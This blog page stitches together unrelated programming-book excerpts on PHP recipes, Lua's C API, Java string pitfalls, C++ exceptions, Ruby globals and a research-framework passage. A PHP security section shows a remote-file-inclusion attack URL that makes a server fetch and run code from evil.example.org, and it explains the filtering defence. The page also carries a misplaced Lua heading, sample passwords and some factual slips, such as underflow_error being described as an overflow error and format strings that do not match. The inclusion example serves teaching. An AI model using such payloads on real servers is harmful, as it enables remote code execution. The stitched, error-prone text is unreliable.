Monday, January 11, 2010

Recipe 18.6. Keeping Passwords Out of Your Site Files










Recipe 18.6. Keeping Passwords Out of Your Site Files



18.6.1. Problem


You need

to use a password to connect to a database, for example. You don't want to put the password in the PHP files you use on your site in case those files are exposed.




18.6.2. Solution


Store the password in an environment variable in a file that the web server loads when starting up. Then, just reference the environment variable in your code:


<?php

mysql_connect('localhost', $_SERVER['DB_USER'], $_SERVER['DB_PASSWORD']);

?>





18.6.3. Discussion


While this technique removes passwords from the source code of your pages, it makes them available in other places that need to be protected. Most importantly, make sure that there are no publicly viewable pages that call phpinfo( ). Because
phpinfo( ) displays all of the environment variables, it exposes any passwords you store there. Also, make sure not to expose the contents of $_SERVER
in other ways, such as with the
print_r( ) function.


Next, especially if you are using a shared host, make sure the environment variables are set in such a way that they are only available to your virtual host, not to all users. With Apache, you can do this by setting the variables in a separate file from the main configuration file:


SetEnv  DB_USER     "susannah"
SetEnv DB_PASSWORD "y23a!t@ce8"



Inside the <VirtualHost> directive for the site in the main configuration file (httpd.conf),
include this separate file as follows:


Include "/usr/local/apache/database-passwords"



Make sure that this separate file containing the password (e.g., /usr/local/apache/database-passwords) is not readable by any user other than the one that controls the appropriate virtual host. When Apache starts up and is reading in configuration files, it's usually running as root, so it is able to read the included file. A child process that handles requests typically runs as an unprivileged user, so rogue scripts cannot read the protected file.




18.6.4. See Also


Documentation on Apache's Include directive at http://httpd.apache.org/docs/mod/core.html#include.













GIM Research Frameworks













GIM Research Frameworks

No formal definition of global information management could be found in the IS literature. Deans and Ricks (1991) refer to issues at the "interface of MIS and international business" (p. 58). Palvia (1997) refers to "global IT research" and describes a model to "assess the strategic impact of IT on a global organization engaged in international business" (p. 230). For this chapter, we define global information management as the development, use, and management of information systems in a global/international context. By global we mean those information systems that have impacts beyond a single country or country of origin. The term global is used in a general sense since no firm or information system is found in every country in the world. Global information management deals with management, technological, and cultural issues such as differing national communications infrastructures, differing IS quality standards, IS development in different cultures, and many others. GIM research is the rigorous and systematic study of the development, use, and operations/management of a global information system(s) in a multicountry organizational environment. At the same time, traditional GIM research includes numerous single country studies focusing on the management of the information resource in a domestic context. According to Palvia (1998a), these "first generation" studies have laid the foundation and helped define global IT. This paper has therefore included single country studies in the analysis.


Most of the published literature in GIM that provides some kind of guide to research in the field has concentrated on identifying the "key issues" in the global management of information resources (Badri, 1992; Deans & Ricks, 1991; Ives & Jarvenpaa, 1991; Palvia, 1998b; Watson et al., 1997). These publications survey various stakeholders involved in the research and practice of GIM and are useful in that they attempt to capture what these people think are the critical issues in the field.


Very few papers propose frameworks or models that will help guide comprehensive research in this area. One exception is the work of Deans and Ricks (1991), who identify key issues and develop a research model based on Nolan and Wetherbe's (1981) IS research model and Skinner's (1964) work on international dimensions. This model views research as a set of subsystems that places management information systems (or GIM) at the center of the set. Skinner's international dimensions (social/cultural, economic, technological, political/legal) are overlaid on this framework to show the scope of the issues involved in GIM. This model is useful in a general sense but does not appear to help in showing where previous research fits or in guiding future research.


Another exception is Palvia (1997). In this paper, a model that attempts to measure the strategic impact of IT on the global firm is proposed. This model is useful in that it identifies a number of strategic factors that should be considered in studying global IT. However, this model does not identify key areas for future research in GIM and was not developed specifically to guide comprehensive research in the field.


Other preliminary frameworks with a focus on culture might also be considered GIM research frameworks. Ein-Dor, Segev, and Orgad (1993), in their model, contend that culture as a variable consists of three major dimensions—economic, demographic, and psycho-sociological. The authors argue that any research into global IT should consider these cultural dimensions. Nelson and Clark (1994) propose a model describing the effect of multicultural environments on IT development and use. However, both of these models are too narrow in their scope and do not provide a broad framework to guide research in GIM.


What appears to be missing at this point is an overall research model, similar to the early IS research models, which will help guide future research into GIM and help organize and categorize research previously done. According to Palvia (1998a), such a framework has yet to be developed.











Recipe 7.17. Defining Static Properties and Methods










Recipe 7.17. Defining Static Properties and Methods



7.17.1. Problem


You want
to



define methods in an object, and be able to access them without instantiating a object.




7.17.2. Solution


Declare the method as
static:


class Format {
public static function number($number, $decimals = 2,
$decimal = ',', $thousands = '.') {
return number_format($number, $decimals, $decimal, $thousands);
}
}

print Format::number(1234.567);
1,234.57





7.17.3. Discussion


Occasionally, you want to define a collection of methods in an object, but you want to be able to invoke those methods without instantiating a object. In PHP 5, declaring a method static lets you call it directly:


class Format {
public static function number($number, $decimals = 2,
$decimal = ',', $thousands = '.') {
return number_format($number, $decimals, $decimal, $thousands);
}
}

print Format::number(1234.567);
1,234.57



Since static methods don't require an object instance, use the class name instead of the object. Don't place a dollar sign ($) before the class name.


Static methods aren't referenced with an arrow (->),

but with double colons (::)'this signals to PHP that the method is static. So in the example, the number( ) method of the Format class is accessed using Format::number( ).


Number formatting doesn't depend on any other object properties or methods. Therefore, it makes sense to declare this method static. This way, for example, inside your shopping cart application, you can format the price of items in a pretty manner with just one line of code and still use an object instead of a global function.


Static methods do not operate on a specific instance of the class where they're defined. PHP does not "construct" a temporary object for you to use while you're inside the method. Therefore, you cannot refer to $this inside a static method, because there's no $this on which to operate. Calling a static method is just like calling a regular function.


PHP 5 also has a feature known as static properties. Every instance of a class shares these properties in common. Thus, static properties act as class-namespaced global variables.


One reason for using a static property is to share a database connection among multiple Database objects. For efficiency, you shouldn't create a new connection to your database every time you instantiate Database. Instead, negotiate a connection the first time and reuse that connection in each additional instance, as shown in Example 7-37.


Sharing a static method across instances



class Database {
private static $dbh = NULL;

public function __construct($server, $username, $password) {
if (self::$dbh == NULL) {
self::$dbh = db_connect($server, $username, $password);
} else {
// reuse existing connection
}
}
}

$db = new Database('db.example.com', 'web', 'jsd6w@2d');
// Do a bunch of queries

$db2 = new Database('db.example.com', 'web', 'jsd6w@2d');
// Do some additional queries




Static properties, like static methods, use the double colon notation. To refer to a static property inside of a class, use the special prefix of self. self is to static properties and methods as $this is to instantiated properties and methods.


The constructor uses self::$dbh to access the static connection property. When $db is instantiated, dbh is still set to NULL, so the constructor calls
db_connect( ) to negotiate a new connection with the database.


This does not occur when you create $db2, since dbh has been set to the database handle.




7.17.4. See Also


Documentation on the static keyword at




http://www.php.net/manual/en/language.oop5.static.php.













The Stack













Programming in Lua
Part IV. The C API
            
Chapter 24. An Overview of the C API



24.2 - The Stack





We face two problems when trying to exchange values between Lua and C:
the mismatch between a dynamic and a static type system
and the mismatch between
automatic and manual memory management.

In Lua, when we write a[k] = v,
both k and v can have several different types
(even a may have different types,
due to metatables).
If we want to offer this operation in C, however,
any settable function must have a fixed type.
We would need dozens of different functions for this single operation
(one function for each combination of types for the three arguments).

We could solve this problem by declaring some kind of union type in C,
let us call it lua_Value,
that could represent all Lua values.
Then, we could declare settable as


void lua_settable (lua_Value a, lua_Value k, lua_Value v);

This solution has two drawbacks.
First, it can be difficult to map
such a complex type to other languages;
Lua has been designed to
interface easily not only with C/C++,
but also with Java, Fortran, and the like.
Second, Lua does garbage collection:
If we keep a Lua value in a C variable,
the Lua engine has no way to know about this use;
it may (wrongly) assume that this value is garbage
and collect it.

Therefore, the Lua API does not define
anything like a lua_Value type.
Instead, it uses an abstract stack to exchange values between Lua and C.
Each slot in this stack can hold any Lua value.
Whenever you want to ask for a value from Lua
(such as the value of a global variable),
you call Lua, which pushes the required value on the stack.
Whenever you want to pass a value to Lua,
you first push the value on the stack,
and then you call Lua (which will pop the value).
We still need a different function to push each C type on the stack
and a different function to get each value from the stack,
but we avoid the combinatorial explosion.
Moreover, because this stack is managed by Lua,
the garbage collector knows which values C is using.

Nearly all functions in the API use the stack.
As we saw in our first example,
luaL_loadbuffer leaves its result on the stack
(either the compiled chunk or an error message);
lua_pcall gets the function to be called from the stack
and leaves any occasional error message there.

Lua manipulates this stack in a strict LIFO discipline
(Last In, First Out; that is, always through the top).
When you call Lua, it only changes the top part of the stack.
Your C code has more freedom;
specifically, it can inspect any element inside the stack
and even insert and delete elements in any arbitrary position.










Programming in Lua



Section 5.4.&nbsp; Code Injection










5.4. Code Injection








An extremely dangerous situation exists when you use tainted data as the leading part of a dynamic include:



<?php

include "{$_GET['path']}/header.inc";

?>



Rather than being able to manipulate only the filename, this situation allows an attacker to manipulate the nature of the resource to be included. Due to a feature of PHP that is enabled by default (and controlled by the allow_url_fopen directive), resources other than files can be included:



<?php

include 'http://www.google.com/';

?>



The behavior of this use of include is that the source of http://www.google.com is included as though it were a local file. While this particular example is harmless, imagine if the source returned by Google contained PHP code. The PHP code would be interpreted and executedexactly the opportunity that an attacker can take advantage of to deliver a serious blow to your security.


Imagine a value of path that indicates a resource under the attacker's control:



http://example.org/index.php?path=http%3A%2F%2Fevil.example.org%2Fevil.inc%3F



In this example, path is the URL encoded value of the following:



http://evil.example.org/evil.inc?



This causes the include statement to include and execute code of the attacker's choosing (evil.inc), and the filename is treated as the query string:



<?php

include "http://evil.example.org/evil.inc?/header.inc";

?>



This eliminates the need for an attacker to guess the remaining pathname and filename (/header.inc) and reproduce this at evil.example.org. Instead, all she must do is make the evil.inc script output valid PHP code to be executed by the victim's web serverit can ignore the query string.


This is just as dangerous as allowing an attacker to edit your PHP scripts directly. Luckily, it is easily defeateduse only filtered data in your include and require statements:



<?php

$clean = array();

/* $_GET['path'] is filtered and stored in $clean['path']. */

include "{$clean['path']}/header.inc";

?>













10. Strings











 < Day Day Up > 







10. Strings



This section concern character strings.





10.1. Arrays do not override Object.toString



Prescription: For char arrays, use String.valueOf to obtain the string representing the designated sequence of characters. For other types of arrays, use Arrays.toString or, prior to release 5.0, Arrays.asList.



References: Puzzle 12; [JLS 10.7].







10.2. String.replaceAll takes a regular expression as its first argument



Prescription: Ensure that the argument is a legal regular expression, or use String.replace instead.



References: Puzzle 20.







10.3. String.replaceAll takes a replacement string as its second argument



Prescription: Ensure that the argument is a legal replacement string, or use String.replace instead.



References: Puzzle 20.







10.4. Repeated string concatenation can cause poor performance



Prescription: Avoid using the string concatenation operator in loops.



References: [EJ item 33].







10.5. Conversion of bytes to characters requires a charset



Prescription: Always select a charset when converting a byte array to a string or char array; if you don't, the platform default charset will be used, leading to unpredictable behavior.



References: Puzzle 18.







10.6. Values of type char are silently converted to int, not String



Prescription: To convert a char to a string, use String.valueOf(char).



References: Puzzles 11 and 23; [JLS 5.1.2].

















     < Day Day Up > 



    The underflow_error Class






    Class Name underflow_error

    Header File <stdexcept>

    Classification Exception

    Class Relationship Diagram



    Class Description

    Member Classes




    None

    Methods




    underflow_error(const string &What_Arg)




    Example





    Class Description



    The underflow_error class is derived from the runtime_error class.
    The underflow_error class represents exceptions that occur because
    arithmetic overflow error.






    Method underflow_error()

    Access Public

    Classification Constructor

    Syntax underflow_error(const string &What_Arg)

    Parameters The What_Arg parameter should contain a description of the kind of exception
    that has occurred.

    Return None



    Description



    The underflow_error() method constructs an object of type underflow_error. The What_Arg parameter
    can be used to set a description of the kind of error that this exception represents.
    A set possible solutions is sometimes supplied with the exception description in addition
    to the type of error.





    The Class Relationship Diagram of underflow_error









    1
    2 #include <stdexcept>
    3
    4
    5 void main(void)
    6 {
    7
    8
    9 try{
    10
    11 exception X;
    12 throw(X);
    13 }
    14 catch(const exception &X)
    15 {
    16 cout << X.what() << endl;
    17
    18 }
    19
    20 try
    21 {
    22 underflow_error UnderFlow("Arithmetic Operation Underflow");
    23 throw(UnderFlow);
    24 }
    25 catch(const exception &X)
    26 {
    27 cout << X.what() << endl;
    28 }
    29
    30
    31
    32 }
    33



    We Want to Hear from You!



    [ Team LiB ]





    We Want to Hear from You!

    As the reader of this book, you are our most important critic and commentator. We value your opinion and want to know what we're doing right, what we could do better, what areas you'd like to see us publish in, and any other words of wisdom you're willing to pass our way.

    As an associate publisher for Sams Publishing, I welcome your comments. You can email or write me directly to let me know what you did or didn't like about this book�as well as what we can do to make our books better.

    Please note that I cannot help you with technical problems related to the topic of this book. We do have a User Services group, however, where I will forward specific technical questions related to the book.

    When you write, please be sure to include this book's title and author as well as your name, email address, and phone number. I will carefully review your comments and share them with the author and editors who worked on the book.

    Email:

    feedback@samspublishing.com

    Mail:

    Michael Stephens
    Associate Publisher
    Sams Publishing
    800 East 96th Street
    Indianapolis, IN 46240 USA

    For more information about this book or another Sams Publishing title, visit our Web site at www.samspublishing.com. Type the ISBN (excluding hyphens) or the title of a book in the Search field to find the page you're looking for.





      [ Team LiB ]



      Program 86: Lack of Self-Awareness













      Program 86: Lack of Self-Awareness

      The following program is designed to test out our simple array. Yet there's a problem that causes the program to fail in an unexpected way.




      1 /************************************************
      2 * array_test -- Test the use of the array class*
      3 ************************************************/
      4 #include <iostream>
      5
      6 /************************************************
      7 * array -- Classic variable length array class.*
      8 * *
      9 * Member functions: *
      10 * operator [] -- Return an item *
      11 * in the array. *
      12 ************************************************/
      13 class array {
      14 protected:
      15 // Size of the array
      16 int size;
      17
      18 // The array data itself
      19 int *data;
      20 public:
      21 // Constructor.
      22 // Set the size of the array
      23 // and create data
      24 array(const int i_size):
      25 size(i_size),
      26 data(new int[size])
      27 {
      28 // Clear the data
      29 memset(data, '\0',
      30 size * sizeof(data[0]));
      31 }
      32 // Destructor -- Return data to the heap
      33 virtual ~array(void)
      34 {
      35 delete []data;
      36 data = NULL;
      37 }
      38 // Copy constructor.
      39 // Delete the old data and copy
      40 array(const array &old_array)
      41 {
      42 delete []data;
      43 data = new int[old_array.size];
      44
      45 memcpy(data, old_array.data,
      46 size * sizeof(data[o]));
      47 }
      48 // operator =.
      49 // Delete the old data and copy
      50 array & operator = (
      51 const array &old_array)
      52 {
      53 delete []data;
      54 data = new int[old_array.size];
      55
      56 memcpy(data, old_array.data,
      57 size * sizeof(data[0]));
      58 return (*this);
      59 }
      60 public:
      61 // Get a reference to an item in the array
      62 int &operator [](const unsigned int item)
      63 {
      64 return data[item];
      65 }
      66 };
      67
      68 /**********************************************
      69 * three_more_elements -- *
      70 * Copy from_array to to_array and *
      71 * put on three more elements. *
      72 **********************************************/
      73 void three_more_elements(
      74 // Original array
      75 array to_array,
      76
      77 // New array with modifications
      78 const array &from_array
      79 )
      80 {
      81 to_array = from_array;
      82 to_array[10] = 1;
      83 to_array[11] = 3;
      84 to_array[11] = 5;
      85 }
      86 int main()
      87 {
      88 array an_array(30); // Simple test array
      89
      90 an_array[2] = 2; // Put in an element
      91 // Put on a few more
      92 three_more_elements(an_array, an_array);
      93 return(0);
      94 }


      (Next Hint 8. Answer 75.)




















      Recipe 10.3. Connecting to an SQL Database










      Recipe 10.3. Connecting to an SQL Database



      10.3.1. Problem


      You want access to a

      SQL database to store or retrieve information. Without a database, dynamic web sites aren't very dynamic.




      10.3.2. Solution


      Create a new
      PDO object with the appropriate connection string. Example 10-8 shows PDO object creation for a few different kinds of databases.


      Connecting with PDO



      <?php
      // MySQL expects parameters in the string
      $mysql = new PDO('mysql:host=db.example.com', $user, $password);
      // Separate multiple parameters with ;
      $mysql = new PDO('mysql:host=db.example.com;port=31075', $user, $password)
      $mysql = new PDO('mysql:host=db.example.com;port=31075;dbname=food', $user, $password)
      // Connect to a local MySQL Server
      $mysql = new PDO('mysql:unix_socket=/tmp/mysql.sock', $user, $password)

      // PostgreSQL also expects parameters in the string
      $pgsql = new PDO('pgsql:host=db.example.com', $user, $password);
      // But you separate multiple parameters with ' '
      $pgsql = new PDO('pgsql:host=db.example.com port=31075', $user, $password)
      $pgsql = new PDO('pgsql:host=db.example.com port=31075 dbname=food', $user, $password)
      // You can put the user and password in the DSN if you like.
      $pgsql = new PDO("pgsql:host=db.example.com port=31075 dbname=food user=$user password
      =$password");

      // Oracle
      // If a database name is defined in tnsnames.ora, just put that in the DSN
      $oci = new PDO('oci:food', $user, $password)
      // Otherwise, specify an Instant Client URI
      $oci = new PDO('oci:dbname=//db.example.com:1521/food', $user, $password)

      // Sybase (If PDO is using FreeTDS)
      $sybase = new PDO('sybase:host=db.example.com;dbname=food', $user, $password)
      // Microsoft SQL Server (If PDO is using MS SQL Server libraries)
      $mssql = new PDO('mssql:host=db.example.com;dbname=food', $user, $password);
      // DBLib (for other versions of DB-lib)
      $dblib = new PDO('dblib:host=db.example.com;dbname=food', $user, $password);

      // ODBC -- a predefined connection
      $odbc = new PDO('odbc:DSN=food');
      // ODBC -- an ad-hoc connection. Provide whatever the underlying driver needs
      $odbc = new PDO('odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=
      C:\\data\\food.mdb;Uid=Chef');

      // SQLite just expects a filename -- no user or password
      $sqlite = new PDO('sqlite:/usr/local/zodiac.db');
      $sqlite = new PDO('sqlite:c:/data/zodiac.db');
      // SQLite can also handle in-memory, temporary databases
      $sqlite = new PDO('sqlite::memory:');
      // SQLite v2 DSNs look similar to v3
      $sqlite2 = new PDO('sqlite2:/usr/local/old-zodiac.db');
      ?>






      10.3.3. Discussion


      If all goes well, the PDO constructor returns a new object that can be used for querying the database. If there's a problem, a PDOException is thrown.


      As you can see from Example 10-8, the format of the DSN is highly dependent on which kind of database you're attempting to connect to. In general, though, the first argument to the PDO constructor is a string that describes the location and name of the database you want and the second and third arguments are the username and password to connect to the database with. Note that to use a particular PDO backend, PHP must be built with support for that backend. Use the output from phpinfo( ) to determine what PDO backends your PHP setup has.




      10.3.4. See Also


      Recipe 10.6 for querying an SQL database; Recipe 10.6 for modifying an SQL database; documentation on PDO at http://www.php.net/PDO.













      Recipe 1.12. Generating Fixed-Width Field Data Records










      Recipe 1.12. Generating Fixed-Width Field Data Records



      1.12.1. Problem


      You need to format


      data records such that each field takes up a set amount of characters.




      1.12.2. Solution


      Use pack( )
      with a format string that specifies a sequence of
      space-padded strings. Example 1-32 transforms an
      array of data into fixed-width records.


      Generating fixed-width field data records



      <?php

      $books = array( array('Elmer Gantry', 'Sinclair Lewis', 1927),
      array('The Scarlatti Inheritance','Robert Ludlum',1971),
      array('The Parsifal Mosaic','William Styron',1979) );

      foreach ($books as $book) {
      print pack('A25A15A4', $book[0], $book[1], $book[2]) . "\n";
      }

      ?>






      1.12.3. Discussion


      The format string A25A14A4 tells pack( ) to transform its subsequent arguments into a 25-character space-padded string, a 14-character space-padded string, and a 4-character space-padded string. For space-padded fields in fixed-width records, pack( ) provides a concise solution.


      To pad fields with something other than a space, however, use
      substr( ) to ensure that the field values aren't too long and str_pad( ) to ensure that the field values aren't too short. Example 1-33 transforms an array of records into fixed-width records with .-padded fields.


      Generating fixed-width field data records without pack( )



      <?php

      $books = array( array('Elmer Gantry', 'Sinclair Lewis', 1927),
      array('The Scarlatti Inheritance','Robert Ludlum',1971),
      array('The Parsifal Mosaic','William Styron',1979) );

      foreach ($books as $book) {
      $title = str_pad(substr($book[0], 0, 25), 25, '.');
      $author = str_pad(substr($book[1], 0, 15), 15, '.');
      $year = str_pad(substr($book[2], 0, 4), 4, '.');
      print "$title$author$year\n";
      }

      ?>






      1.12.4. See Also


      Documentation on pack( ) at http://www.php.net/pack and on str_pad( ) at http://www.php.net/str_pad. Recipe 1.16 discusses pack( ) format strings in more detail.













      Recipe 21.5. Avoiding Regular Expressions










      Recipe 21.5. Avoiding Regular Expressions



      21.5.1. Problem


      You want to
      improve script performance by optimizing string-matching operations.




      21.5.2. Solution


      Replace unnecessary regular expression calls with faster string and character type function alternatives.




      21.5.3. Discussion


      A common source of unnecessary computation is the use of regular expression functions when they are not needed'for example, if you're validating a
      form submission for a valid username and want to make sure that the username contains only alphanumeric characters.


      A common approach to this problem is a regular expression:


      <?php
      if (!preg_match('/^[a-z0-9]*$/i', $username)) {
      echo 'please enter a valid username.';
      }
      ?>



      The same test can be performed much faster with the ctype_alnum( )
      function.


      Using code-timing techniques covered in Recipe 21.1, let's compare the above test with ctype_alnum( ):


      <?php
      $username = 'foo411';

      $start = microtime(true);

      if (!preg_match('/^[a-z0-9]*/i', $username)) {
      echo 'please enter a valid username';
      }

      $regextime = microtime(true) - $start;

      $start = microtime(true);

      if (!ctype_alnum($username)) {
      echo 'please enter a valid username';
      }

      $ctypetime = microtime(true) - $start;

      echo "preg_match took: $regextime seconds\n";
      echo "ctype_alnum took: $ctypetime seconds\n";
      ?>



      This will output results similar to:


      preg_match took:  0.000163078308105 seconds
      ctype_alnum took: 9.05990600586E-06 seconds



      ctype_alnum( ) is considerably faster; 9.05990600586E-06 is the same as 0.00000906 seconds, which is 18 times faster than the preg_match( ) regular expression, with exactly the same result.


      When applied to a complex application, replacing unnecessary regular expressions with equivalent alternatives can add up to a significant performance gain.


      A good litmus test when you're coding and need to decide whether or not you need to use a regular expression is whether or not the match you're performing can be explained in a brief sentence. Granted, there are some matches, such as "string is a valid email address," which cannot be adequately verified without a complex regular expression. However, "check if string A contains string B" can be tested with several different approaches, but is ultimately a very simple test that does not require regular expressions:


      $haystack = 'The quick brown fox jumps over the lazy dog';
      $needle = 'lazy dog';

      // slowest
      if (ereg($needle, $haystack)) echo 'match!';

      // slow
      if (preg_match("/$needle/", $haystack)) echo 'match!';


      // fast
      if (strstr($haystack, $needle)) echo 'match!';

      // fastest
      if (strpos($haystack, $needle) !== false) echo 'match!';



      There is certainly a benefit to double-checking the ctype and string functions before making a commitment to a regular expression, particularly if you're working a section of code that will loop repeatedly.




      21.5.4. See Also


      Documentation on ctype functions at http://www.php.net/manual/en/ref.ctype.php; on string functions at http://www.php.net/manual/en/ref.strings.php; on regular expression functions at http://www.php.net/manual/en/ref.pcre.php.













      Section 10.2. The Top-Level Environment








      10.2. The Top-Level Environment


      When the Ruby interpreter starts, a number of classes, modules,
      constants, and global variables and global functions are defined and
      available for use by programs. The subsections that follow list these
      predefined features.



      10.2.1. Predefined Modules and Classes


      When the Ruby 1.8 interpreter starts, the following modules are
      defined:


      Comparable      FileTest        Marshal         Precision
      Enumerable GC Math Process
      Errno Kernel ObjectSpace Signal



      These classes are defined on startup:


      Array           File            Method          String
      Bignum Fixnum Module Struct
      Binding Float NilClass Symbol
      Class Hash Numeric Thread
      Continuation IO Object ThreadGroup
      Data Integer Proc Time
      Dir MatchData Range TrueClass
      FalseClass MatchingData Regexp UnboundMethod



      The following exception classes are also defined:


      ArgumentError           NameError               SignalException
      EOFError NoMemoryError StandardError
      Exception NoMethodError SyntaxError
      FloatDomainError NotImplementedError SystemCallError
      IOError RangeError SystemExit
      IndexError RegexpError SystemStackError
      Interrupt RuntimeError ThreadError
      LoadError ScriptError TypeError
      LocalJumpError SecurityError ZeroDivisionError



      Ruby 1.9 adds the following modules, classes, and
      exceptions:


      BasicObject     FiberError      Mutex           VM
      Fiber KeyError StopIteration



      You can check the predefined modules, classes, and exceptions in
      your implementation with code like this:


      # Print all modules (excluding classes)
      puts Module.constants.sort.select {|x| eval(x.to_s).instance_of? Module}

      # Print all classes (excluding exceptions)
      puts Module.constants.sort.select {|x|
      c = eval(x.to_s)
      c.is_a? Class and not c.ancestors.include? Exception
      }

      # Print all exceptions
      puts Module.constants.sort.select {|x|
      c = eval(x.to_s)
      c.instance_of? Class and c.ancestors.include? Exception
      }





      10.2.2. Top-Level Constants


      When the Ruby interpreter starts, the following top-level
      constants are defined (in addition
      to the modules and classes listed previously). A module that defines a
      constant by the same name can still access these top-level constants by
      explicitly prefixing them with ::. You can list the
      top-level constants in your implementation with:


      ruby -e 'puts Module.constants.sort.reject{|x| eval(x.to_s).is_a? Module}'






      ARGF



      An IO object providing access to a
      virtual concatenation of files named in ARGV,
      or to standard input if ARGV is empty. A
      synonym for $<.






      ARGV



      An array containing the arguments specified on the command line. A
      synonym for $*.






      DATA



      If your program file includes the token
      __END__ on a line by itself, then this constant
      is defined to be a stream that allows access to the lines of the
      file following __END__. If the program file
      does not include __END__, then this constant is
      not defined.






      ENV



      An object that behaves like a hash and provides access
      to the environment variable settings in effect for the
      interpreter.






      FALSE



      A deprecated synonym for false.






      NIL



      A deprecated synonym for nil.






      RUBY_PATCHLEVEL



      A string indicating the patchlevel for the interpreter.






      RUBY_PLATFORM



      A string indicating the platform of the Ruby interpreter.






      RUBY_RELEASE_DATE



      A string indicating the release date of the Ruby interpreter.






      RUBY_VERSION



      A string indicating the version of the Ruby language supported by the
      interpreter.






      STDERR



      The standard error output stream. This is the default
      value of the $stderr variable.






      STDIN



      The standard input stream. This is the default value of the
      $stdin variable.






      STDOUT



      The standard output stream. This is the default value of the
      $stdout variable.






      TOPLEVEL_BINDING



      A Binding object representing the
      bindings in the top-level scope.






      TRUE



      A deprecated synonym for true.






      10.2.3. Global Variables


      The Ruby interpreter predefines a number of global variables that your
      programs can use. Many of these variables are special in some way. Some
      use punctuation characters in their names. (The
      English.rb module defines English-language
      alternatives to the punctuation. Add require
      'English'
      to your program if you want to use these verbose
      alternatives.) Some are read-only and may not be assigned to. And some
      are thread-local, so that each thread of a Ruby program may see a
      different value of the variable. Finally, some global variables
      ($_, $~, and the pattern-matching
      variables derived from it) are method-local: although the variable is
      globally accessible, its value is local to the current method. If a
      method sets the value of one of these magic globals, it does not alter
      the value seen by the code that invokes that method.


      You can obtain the complete list of global variables predefined by
      your Ruby interpreter with:


      ruby -e 'puts global_variables.sort'



      To include the verbose names from the English
      module in your listing, try:


      ruby -rEnglish -e 'puts global_variables.sort'



      The subsections that follow document the predefined global
      variables by category.



      10.2.3.1. Global settings

      These global variables hold configuration settings and specify
      information, such as command-line arguments, about the environment in
      which the Ruby program is running:





      $*



      A read-only synonym for the ARGV
      constant. English synonym: $ARGV.






      $$



      The process ID of the current Ruby process. Read-only.
      English synonyms: $PID,
      $PROCESS_ID.






      $?



      The exit status of the last process terminated.
      Read-only and thread-local. English synonym:
      $CHILD_STATUS.






      $DEBUG




      $-d



      Set to true if the
      -d or --debug options were
      set on the command line.






      $KCODE




      $-K



      In Ruby 1.8, this variable holds a string that names the
      current text encoding. Its value is "NONE", "UTF8", "SJIS" or
      "EUC". This value can be set with the interpreter option
      -K. This variable no longer works in Ruby 1.9
      and using it causes a warning.






      $LOADED_FEATURES




      $"



      An array of strings naming the files that have been
      loaded. Read-only.






      $LOAD_PATH




      $:




      $-I



      An array of strings holding the directories to be searched
      when loading files with the load and
      require methods. This variable is read-only,
      but you can alter the contents of the array to which it refers,
      appending or prepending new directories to the path, for
      example.






      $PROGRAM_NAME




      $0



      The name of the file that holds the Ruby program currently
      being executed. The value will be "-" if the
      program is read from standard input, or "-e"
      if the program was specified with a -e
      option. Note that this is different from
      $FILENAME.






      $SAFE



      The current safe level for program execution. See Section 10.5
      for details. This variable may be set from the command line with
      the -T option. The value of this variable is
      thread-local.






      $VERBOSE




      $-v




      $-w



      True if the -v, -w,
      or --verbose command-line option is
      specified. nil if -W0 was
      specified. false otherwise. You can set this
      variable to nil to suppress all
      warnings.






      10.2.3.2. Exception-handling globals

      The following two global variables are useful in
      rescue clauses when an exception has been
      raised:





      $!



      The last exception object raised. The exception
      object can also be accessed using the =>
      syntax in the declaration of the rescue
      clause. The value of this variable is thread-local. English
      synonym: $ERROR_INFO.






      $@



      The stack trace of the last exception, equivalent to
      $!.backtrace. This value is thread-local.
      English synonym: $ERROR_POSITION.






      10.2.3.3. Streams and text-processing globals

      The following globals are IO streams and variable that
      affect the default behavior of text-processing
      Kernel methods. You'll find examples of their use
      in Section 10.3:





      $_



      The last string read by the Kernel
      methods gets and readline.
      This value is thread-local and method-local. A number of
      Kernel methods operate implicitly on
      $_. English synonym:
      $LAST_READ_LINE.






      $<



      A read-only synonym for the ARGF
      stream: an IO-like object providing access to
      a virtual concatenation of the files specified on the
      command-line, or to standard input if no files were specified.
      Kernel read methods, such as
      gets, read from this stream. Note that this
      stream is not always the same as $stdin.
      English synonym: $DEFAULT_INPUT.






      $stdin



      The standard input stream. The initial value of this
      variable is the constant STDIN. Many Ruby
      program read from ARGF or
      $< instead of
      $stdin.






      $stdout




      $>



      The standard output stream, and the destination of the
      printing methods of Kernel: puts,
      print, printf, etc.
      English synonym: $DEFAULT_OUTPUT.






      $stderr



      The standard error output stream. The initial value of this variable
      is the constant STDERR.






      $FILENAME



      The name of the file currently being read from
      ARGF. Equivalent to
      ARGF.filename. Read-only.






      $.



      The number of the last line read from the current input file.
      Equivalent to ARGF.lineno. English synonyms:
      $NR,
      $INPUT_LINE_NUMBER.






      $/




      $-0



      The input record separator (newline by default).
      gets and readline use this
      value by default to determine line boundaries. You can set this
      value with the -0 interpreter option. English
      synonyms: $RS,
      $INPUT_RECORD_SEPARATOR.






      $\



      The output record separator. The default value is
      nil, but is set to $/ when
      the interpreter option -l is used. If
      non-nil, the output record separator is
      output after every call to print (but not
      puts or other output methods). English
      synonyms: $ORS,
      $OUTPUT_RECORD_SEPARATOR.






      $,



      The separator output between the arguments to
      print and the default separator for
      Array.join. The default is
      nil. English synonyms:
      $OFS, $OUTPUT_FIELD_SEPARATOR.






      $;




      $-F



      The default field separator used by split. The
      default is nil, but you can specify a value
      with the interpreter option -F. English
      synonyms: $FS,
      $FIELD_SEPARATOR.






      $F



      This variable is defined if the Ruby interpreter is invoked with
      the -a option and either
      -n or -p. It holds the
      fields of the current input line, as returned by
      split.






      10.2.3.4. Pattern-matching globals

      The following globals are thread-local and method-local and are
      set by any Regexp pattern-matching
      operation:





      $~



      The MatchData object produced by
      the last pattern matching operation. This value is thread-local
      and method-local. The other pattern-matching globals described
      here are derived from this one. Setting this variable to a new
      MatchData object alters the value of the
      other variables. English synonym:
      $MATCH_INFO.






      $&



      The most recently matched text. Equivalent to
      $~[0]. Read-only, thread-local, method-local,
      and derived from $~. English synonym:
      $MATCH.






      $`



      The string preceding the match in the last pattern match. Equivalent to
      $~.pre_match. Read-only, thread-local,
      method-local, and derived from $~. English
      synonym: $PREMATCH.






      $'



      The string following the match in the last pattern match.
      Equivalent to $~.post_match Read-only,
      thread-local, method-local, and derived from
      $~. English synonym:
      $POSTMATCH.






      $+



      The string corresponding to the last successfully matched
      group in the last pattern match. Read-only, thread-local,
      method-local, and derived from $~. English
      synonym:
      $LAST_PAREN_MATCH.






      10.2.3.5. Command-line option globals

      Ruby defines a number of global variables that correspond to the
